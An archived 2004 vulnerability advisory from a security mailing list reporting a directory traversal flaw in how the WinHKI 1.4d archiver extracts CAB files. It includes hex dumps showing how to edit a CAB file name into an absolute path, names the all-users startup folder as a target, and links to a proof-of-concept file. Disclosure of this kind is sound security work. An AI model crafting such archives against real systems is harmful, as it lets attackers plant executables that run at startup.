lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
From: theinsider at 012.net.il (Rafel Ivgi, The-Insider) Subject: WinHKI - CAB File Directory Transversal ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application: WinHKI Vendors: http://www.webtoolmaster.com Versions: 1.4d Platforms: Windows Bug: CAB File Directory Transversal Exploitation: Local (extract file) Date: 24 Dec 2004 Author: Rafel Ivgi, The-Insider E-Mail: the_insider@...l.com Website: http://theinsider.deep-ice.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1) Introduction 2) Bugs 3) The Code ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =============== 1) Introduction =============== WinHKI is a file archiever which supports: BH, CAB, HKI, JAR, LHA,TAR, GZ compressions. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ====== 2) Bug ====== This is a normal CAB compressed file header 00000000 4D53 4346 0000 0000 0E30 0F00 0000 0000 MSCF.....0...... 00000010 2C00 0000 0000 0000 0301 0100 0100 0000 ,............... 00000020 0000 0000 5800 0000 2000 0100 C8EE 0F00 ....X... ....... 00000030 0000 0000 0000 0C2F CC61 2000 7356 5656 ......./.a .sVVV 00000040 5656 5656 5656 5656 5656 5656 5656 5656 VVVVVVVVVVVVVVVV 00000050 5670 352E 6578 6500 5D5B 7CBC 2742 0080 Vp5.exe.][|.'B.. 00000060 434B EC5A 7F54 5457 7E7F 33CC C000 036F CK.Z.TTW~.3....o in the following code, we can see how easy it is to change the path to anywhere we want, including the all users start up folder. 00000000 4D53 4346 0000 0000 0E30 0F00 0000 0000 MSCF.....0...... 00000010 2C00 0000 0000 0000 0301 0100 0100 0000 ,............... 00000020 0000 0000 5800 0000 2000 0100 C8EE 0F00 ....X... ....... 00000030 0000 0000 0000 0C2F CC61 2000 433A 5C56 ......./.a .C:\V 00000040 5656 5656 5656 5656 5656 5656 5656 5656 VVVVVVVVVVVVVVVV 00000050 5670 352E 6578 6500 5D5B 7CBC 2742 0080 Vp5.exe.][|.'B.. 00000060 434B EC5A 7F54 5457 7E7F 33CC C000 036F CK.Z.TTW~.3....o All we need to do is cab compress (using Microsoft's "makecab" or Winace) a file with a long name/path and change the path specified inside the file to whatever we want Using any Hex editor such as HexWorkshop, just add anything to the filename. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =========== 3) The Code =========== An online proof of concept can be found at: http://theinsider.web1000.com/hki transversal.cab ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --- Rafel Ivgi, The-Insider http://theinsider.deep-ice.com "Scripts and Codes will make me D.O.S , but they will never HACK me."
Powered by blists - more mailing lists